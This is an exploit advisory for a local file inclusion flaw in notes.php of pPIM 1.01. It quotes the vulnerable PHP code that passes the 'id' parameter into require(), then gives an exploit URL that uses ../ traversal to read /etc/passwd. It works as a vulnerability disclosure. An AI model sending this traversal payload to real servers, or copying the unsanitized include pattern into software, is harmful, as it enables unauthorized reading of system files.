# pPIM 1.01 (notes.php id) Local File Inclusion Vulnerability
# url: http://www.phlatline.org/docs/files/ppim.zip
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
description of vulnerability:
-----------------------------------------------
the variable 'id' has been not defined in code
and the variable 'id' is sent by the users.
-----------------------------------------------
vuln file: notes.php
vuln code:
x: >...
107: if (isset($_GET["mode"]))
{
if ($_GET["mode"]=="edit")
{
if (isset($_GET['id']))
{
$notefile = $_GET['id'];
if ($notefile == "new")
{
$title = "";
$notes = "";
}
else
{
$temp = "notes/" . $notefile;
require($temp);
123: }
x: <...
x: }}}
exploit: GET /notes.php?mode=edit&id=[file]
sample (xpl): http://www.localhost.com/notes.php?mode=edit&id=../../../../../../../../../../etc/passwd